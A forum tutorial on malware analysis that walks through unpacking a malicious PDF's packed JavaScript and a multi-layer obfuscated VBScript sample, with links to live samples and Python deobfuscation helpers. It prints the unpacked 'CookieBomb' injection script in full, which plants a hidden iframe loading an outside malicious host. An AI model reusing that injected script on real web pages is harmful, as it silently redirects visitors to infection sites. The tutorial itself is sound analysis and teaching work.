Author Topic: [Tutorial] Analyzing Malware by Example Part 6 - Unpacking Scripts  (Read 1039 times)


Offline Deque
PDF Analysis and Script Unpacking

Sample 1 (PDF)

Download the following sample: sampleprep2lvl2.zip

Warning: This is live malware!
The password is "infected".

TrID will tell you that this is a PDF file.

Download PDFStreamDumper. You can also find a small tutorial for this tool in Analyzing Suspicious PDF Files With PDF Stream Dumper.

Open the programme, click Load and navigate to our sample. Browse through the streams for anything suspicious. In the very last stream you will find packed JavaScript code.



Script unpacking, whether the script is JavaScript, VBScript, Perl or something else, is easy in most cases. You need to look for "eval" or a function with a similar purpose.
eval executes a string as JavaScript, which makes it the ideal place to hide code: the real script is stored as an encoded string and decoded at runtime.
You only need to replace the eval with a function that prints its argument, execute the code, and you get the unpacked script. In JavaScript, document.write serves as that replacement.

Download Javascript Deobfuscator. Copy and paste the JavaScript code from PDFStreamDumper into Javascript Deobfuscator. You can see that the code consists of two parts, a large packed string and a decryption routine for that string. The eval is usually at the very end of the function. This is also the case here, except that the variable e has been set to eval right at the beginning.

Beginning:
e = eval;

End:
e(zaz);

The good thing is that you don't need to understand the decryption code to unpack this script. Just mark the 'e' in e(zaz); with the mouse, then click the Convert button to get the unpacked script. Click Copy Output to Input and then Beautify to get proper indentation.



The unpacked code looks as follows:

Code: (JavaScript) [Select]
function zzzfff() {
    var zte = document.createElement('iframe');

    zte.src = 'http://f2f365.com/counter.php';
    zte.style.position = 'absolute';
    zte.style.border = '0';
    zte.style.height = '1px';
    zte.style.width = '1px';
    zte.style.left = '1px';
    zte.style.top = '1px';

    if (!document.getElementById('zte')) {
        document.write('<div id=\'zte\'></div>');
        document.getElementById('zte').appendChild(zte);
    }
}

function SetCookie(cookieName, cookieValue, nDays, path) {
    var today = new Date();
    var expire = new Date();
    if (nDays == null || nDays == 0) nDays = 1;
    expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie(name) {
    var start = document.cookie.indexOf(name + "=");
    var len = start + name.length + 1;
    if ((!start) &&
        (name != document.cookie.substring(0, name.length))) {
        return null;
    }
    if (start == -1) return null;
    var end = document.cookie.indexOf(";", len);
    if (end == -1) end = document.cookie.length;
    return unescape(document.cookie.substring(len, end));
}

if (navigator.cookieEnabled) {
    if (GetCookie('visited_uq') == 55) {} else {
        SetCookie('visited_uq', '55', '1', '/');

        zzzfff();
    }
}

The purpose of the code is probably not immediately clear, but there is an interesting URL in it. Google for that URL:
hxxp :// f2f365 . com/counter . php
One of the very first matches should be the article "Proof of Concept of "CookieBomb" code injection attack".

The article lists our URL.
The code shown there is roughly similar to ours and is explained well in the article:

Quote
The code in the template above means: When a cookie-enabled browser accesses these infected sites, the code is executed in the JavaScript environment to check whether your browser already has a specific cookie and value; if not, then that cookie is created for you. At the same time, no matter whether you have the cookie or not, you will be redirected to the other site via a hidden IFRAME.

Do not rely on that alone; verify that the description fits the code you have in front of you.

Quote
After the redirection is made, the PHP (or Java, etc.) script (masked as cnt.php, clk.php, click.php, rel.php, dtd.php, counter.php, clicker.php, and so on) is "supposed" to check the cookie's values and other conditions and then execute an "action" once those conditions are met, and this "action" is never good. They can execute another redirection or a straight infection, depending on the needs of the hacker. It is a simple scheme, it works, and it is deployable in a mass automation scheme.

We cannot verify what the actual counter.php script does in our case, because it is not accessible anymore. But in any case this PDF redirects the victim to this bad URL with the counter.php script, which might have infected the system.

Sample 2 (VBScript)

Download the following sample: Microsoft Word.WsF.vir.zip

Warning: This is live malware!
The password is "infected".

Transfer this sample to your VM for unpacking. Open it in a text editor. The sample consists of a large encoded string and a small VBScript unpacking code in the beginning. The function HIO seems to be responsible for unpacking.
You will find code that looks like this:

FUnction:Execute(HIO("FMdN9R8lOReYpG7Xn869nKcnS87pPk2L9gU <large string>

The Execute is our eval equivalent here. We need to replace this with a function that prints out the string instead of executing it. So you can, e.g., google for "vbscript write to console" and you will find out that you need to use WScript.Echo in combination with cscript.exe to print to the console. So replace Execute with WScript.Echo as follows:

FUnction: WScript.Echo(HIO("FMdN9R8lOReYpG7Xn869nKcnS87pPk2L9gU <large string>

In the next step, execute the script from the terminal with cscript.exe; the > redirects the output into the file unpacked1.vbs. The file name contains a space, so it has to be quoted:

cscript.exe "Microsoft Word.WsF" > unpacked1.vbs

Note: If you double-click a VBScript file (.WsF or .vbs extension), it is usually run via wscript.exe. You can try that too, but the output will be shown in a message window, which is not what we want. Using cscript.exe instead of wscript.exe ensures that the output is written to the terminal.

Open unpacked1.vbs in a text editor and you will see that this file is packed with another layer. Just repeat the step: search for the Execute and replace it with WScript.Echo. You will find that it looks as follows:

EXEcute QQ

Note: VBScript is case insensitive, so EXEcute is the same as execute or Execute.

Remove the header from the file or you won't be able to execute it as VBScript:

Code: [Select]
Microsoft (R) Windows Script Host Version 5.7
Copyright (C) Microsoft Corporation. All rights reserved.

Then run the script from the command line to unpack it:

cscript.exe unpacked1.vbs > unpacked2.vbs

This time you get a smaller output that looks as follows:

Quote
Microsoft (R) Windows Script Host Version 5.7
Copyright (C) Microsoft Corporation. All rights reserved.

XUo= SPLIT(XUo,".")
FOR XjM = 1 TO UBOUND(XUo)
OeT=OeT&cHr(XUo(XjM)/18)
NEXT
eXeCUTEGlObaL(OeT)


This can't be the whole unpacked virus, right?
There is also no Execute, but an eXeCUTEGlObaL. Look it up on MSDN; it will tell you:

Quote
Executes one or more specified statements in the global namespace of a script.

The code in unpacked2.vbs only works together with the code in unpacked1.vbs. So open unpacked1.vbs in a text editor again and replace the following line:

Code: [Select]
WScript.Echo QQ
With this code:

Quote
XUo= SPLIT(XUo,".")
FOR XjM = 1 TO UBOUND(XUo)
OeT=OeT&cHr(XUo(XjM)/18)
NEXT
WScript.Echo(OeT)


Execute the modified unpacked1.vbs:

cscript.exe unpacked1.vbs > unpacked3.vbs
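The decode loop in unpacked2.vbs can also be reproduced statically, so the final layer does not have to be executed in the VM at all. This is an added example and not part of the original post; it assumes the value of the XUo string has been copied out of unpacked1.vbs, and the sample input below is constructed here, not taken from the malware.

```python
def decode_dotted_layer(encoded, divisor=18):
    """Static equivalent of the VBScript loop in unpacked2.vbs:

        XUo = SPLIT(XUo, ".")
        FOR XjM = 1 TO UBOUND(XUo)
            OeT = OeT & cHr(XUo(XjM) / 18)
        NEXT

    VBScript arrays are 0-based, so a loop starting at 1 skips the first
    element (everything before the first dot). Returns the decoded text.
    """
    parts = encoded.split(".")
    out = []
    for pos, part in enumerate(parts[1:], start=1):
        # Every element must be an exact multiple of the divisor; anything
        # else means a wrong divisor or a damaged string, which is better
        # reported than silently turned into garbage characters.
        value, remainder = divmod(int(part), divisor)
        if remainder != 0:
            raise ValueError(f"element {pos} ({part}) is not a multiple of {divisor}")
        out.append(chr(value))
    return "".join(out)


def encode_dotted_layer(plain, divisor=18, prefix="0"):
    """Inverse of the decoder, used here only to build a constructed sample.
    The prefix stands in for the unused element 0 of the split array."""
    return prefix + "".join("." + str(ord(c) * divisor) for c in plain)


# Constructed sample (hypothetical), not the string from the real sample.
SAMPLE_PLAIN = 'MsgBox "hello"'
SAMPLE_ENCODED = encode_dotted_layer(SAMPLE_PLAIN)

if __name__ == "__main__":
    print(SAMPLE_ENCODED)
    print(decode_dotted_layer(SAMPLE_ENCODED))
```

To use it on the real sample, paste the XUo string from unpacked1.vbs into decode_dotted_layer and write the result to unpacked3.vbs instead of running the script.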

Open unpacked3.vbs in a text editor. This code is not packed anymore, but it is obfuscated. You will see that it consists of only one line. The colon is a statement separator in VBScript, so use the search-and-replace function of your text editor to replace each colon with a newline. In Notepad++, for example, press Ctrl + F, click the Replace tab and select the extended mode that understands \r, \n, \t etc. Then enter the colon as the search string and \n as the replacement string and press Replace All.
You will already be able to read the code better, but the strings in the code are still obfuscated. Our programming skills come in handy to deobfuscate them. I decided to use Python for this and came up with the following code:

Code: (python) [Select]
import re

fname = "unpacked3.vbs"

with open(fname) as f:
    for line in f:
        # every X(<number>) call in the obfuscated script stands for the
        # single character chr(<number>)
        found = re.findall(r"X\((\d+)\)", line)
        for item in found:
            # the characters are joined with &, so drop the operator as well
            line = line.replace("&X(" + item + ")", chr(int(item)))
            line = line.replace("X(" + item + ")", chr(int(item)))
        # the line still carries its own newline, so do not add a second one
        print(line.lower(), end="")

The script prints the deobfuscated code to the command line.
The result is not perfect, because the strings lack their quotation marks, but it is more than enough to be able to read the code.

You may now analyse the unpacked script further and answer the following questions for yourself:
What registry entries does the sample create?
How does the sample spread?
What malware type and malware family is it?
« Last Edit: February 08, 2016, 01:55:19 pm by Deque »